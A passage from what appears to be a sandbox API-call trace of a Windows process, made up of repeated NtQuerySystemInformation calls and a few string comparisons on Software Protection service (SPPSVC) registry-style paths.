SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0283.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0283.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0283.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf70, Length=0x28, ResultLength=0x0) [0283.911] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0283.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0283.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0283.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0283.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0283.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0283.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0283.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x28, ResultLength=0x0) [0283.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0283.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0283.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0283.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x40, ResultLength=0x0) [0283.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0283.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0283.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0283.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0283.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea8, Length=0x30, ResultLength=0x0) [0283.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x38, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.930] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0283.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0283.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0283.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0283.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0283.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0283.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0283.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0283.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0283.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea8, Length=0x30, ResultLength=0x0) [0283.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x38, ResultLength=0x0) [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.950] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0283.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.962] _wcsicmp 